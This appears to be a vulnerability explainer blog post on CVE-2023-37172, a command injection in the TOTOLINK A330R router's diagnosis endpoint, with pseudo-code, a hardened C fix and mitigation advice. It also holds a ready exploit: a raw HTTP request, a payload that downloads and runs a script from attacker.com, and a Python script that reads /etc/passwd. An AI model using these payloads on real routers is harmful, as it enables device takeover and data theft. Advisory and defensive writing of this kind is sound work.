CVE-2023-37172 - Command Injection in TOTOLINK A330R (V17.0.0cu.557_B20221024) Explained

In mid-2023, a serious vulnerability was found in the TOTOLINK A330R router firmware (version V17.0.0cu.557_B20221024). Labeled CVE-2023-37172, this flaw allows a remote unauthenticated attacker to execute arbitrary commands on the device through the ip parameter used by the setDiagnosisCfg function. In this article, we'll break down the bug, show you how it can be exploited, and explain how you can protect yourself.

What Is CVE-2023-37172?

This vulnerability is a command injection. In simple terms, it means an attacker can make the router's operating system execute any command they choose, just by sending a specially crafted request. The root of the problem is that the router's web management interface does not properly sanitize the input provided to the ip parameter in the setDiagnosisCfg endpoint.

If you own this router and someone can reach it on your network, they might be able to take over your device — steal sensitive information, reroute your connection, or use your router for attacks on other networks.

The Vulnerable Function

When a user wants to diagnose network issues using the TOTOLINK A330R's web interface, the device lets them specify an IP address to test (for example, with a ping or traceroute). This is managed by a function called setDiagnosisCfg.

But here's the problem: the firmware takes whatever value is entered as the 'ip', plugs it directly into a command line without checking for malicious content, and runs it. This means an attacker can submit inputs that include shell commands.

Below is an example (the actual firmware code is closed-source, but this is a close representation):

// Pseudo code representing the vulnerable behavior
#include <stdio.h>
#include <stdlib.h>

void setDiagnosisCfg(char* ip) {
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "ping %s", ip);  // User-controlled value pasted straight into a shell command line
    system(cmd); // Dangerous: input not sanitized, and /bin/sh parses the whole string
}

When someone supplies an IP like 192.168.0.1, the command becomes:

ping 192.168.0.1

If they supply something malicious like 8.8.8.8; cat /etc/passwd, the command becomes:

ping 8.8.8.8; cat /etc/passwd

Because the shell treats ; as a command separator, this runs the ping and then cat /etc/passwd, leaking sensitive data.
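As an added example (not TOTOLINK's code, and independent of the pseudo-code above), here is how the same function can be hardened: the ip value is accepted only if it parses as a literal IPv4/IPv6 address, and ping is launched through fork/execvp with an argv array so that no shell ever interprets the string. The function name setDiagnosisCfg_safe and the dry_run flag are my own assumptions for illustration.

```c
/* Added example: hardened replacement for the vulnerable setDiagnosisCfg
 * pattern. Two independent fixes: (1) validate that ip is a literal
 * IPv4/IPv6 address with inet_pton(), so "8.8.8.8; cat /etc/passwd" is
 * rejected; (2) run ping via fork/execvp with an argv array, so even a
 * value that slipped past validation is passed as a single argument and
 * never parsed by /bin/sh. */
#include <arpa/inet.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if s is a well-formed IPv4 or IPv6 literal, else 0. */
int is_ip_literal(const char *s) {
    unsigned char buf[16];
    if (s == NULL || strlen(s) > 45) return 0;      /* 45 = longest IPv6 text form */
    return inet_pton(AF_INET, s, buf) == 1 || inet_pton(AF_INET6, s, buf) == 1;
}

/* Hardened diagnosis. Returns -1 if the input is rejected, -2 on a
 * fork/exec failure, otherwise ping's exit status. dry_run=1 (assumed
 * flag for testing) performs the check but skips execution. */
int setDiagnosisCfg_safe(const char *ip, int dry_run) {
    if (!is_ip_literal(ip)) return -1;              /* reject anything that is not an address */
    if (dry_run) return 0;

    char *const argv[] = { "ping", "-c", "4", (char *)ip, NULL };
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {                                 /* child: exec directly, no shell involved */
        execvp("ping", argv);
        _exit(127);                                 /* only reached if exec itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}
```

Validation alone is not enough on its own; the execvp step is what removes the shell from the path, so keep both.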

Typically, the vulnerable endpoint is called like this (over HTTP, not HTTPS):

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router-ip>
Cookie: ... (you may or may not need a valid session cookie, depending on router config)
Content-Type: application/x-www-form-urlencoded

topicurl=diag&setDiagnosisCfg=1&ip=<YOUR_PAYLOAD_HERE>

By setting the ip parameter to a value like

8.8.8.8;wget http://attacker.com/malware.sh -O /tmp/malware.sh;sh /tmp/malware.sh

you can make the router download and run any script you want.

Example with Python (No Authentication)

import requests

router_ip = "192.168.1.1"  # Change to your router's IP
url = f"http://{router_ip}/cgi-bin/cstecgi.cgi"

# Command to run on router
payload = "8.8.8.8; cat /etc/passwd"

data = {
    "topicurl": "diag",
    "setDiagnosisCfg": "1",
    "ip": payload,
}

r = requests.post(url, data=data)
print(r.text)

An attacker who gains this level of access can also install persistent backdoors.

This could affect not just home users, but also small offices using this inexpensive router.

How To Protect Yourself

1. Check your firmware version.
If you have V17.0.0cu.557_B20221024, you are vulnerable.

2. Update your router.
TOTOLINK releases firmware updates on their official support page. Always use the newest version.

3. Disable remote management.
Never expose your router’s admin interface to the internet.

4. Isolate your devices.
If possible, place your router in a restrictive network segment so only trusted users can access it.

References and Further Reading

- NVD Entry for CVE-2023-37172
- TOTOLINK Firmware Download
- ExploitDB Entry
- Original Disclosure (Chinese)

Final Thoughts

CVE-2023-37172 is a severe command injection vulnerability that can let attackers take complete control of TOTOLINK A330R routers running outdated firmware. The best defense is to update your firmware, disable unnecessary remote access, and stay informed about security advisories for your devices.

Stay safe, and always keep your devices up-to-date!

Timeline

Published on: 07/07/2023 20:15:00 UTC
Last modified on: 07/13/2023 17:32:00 UTC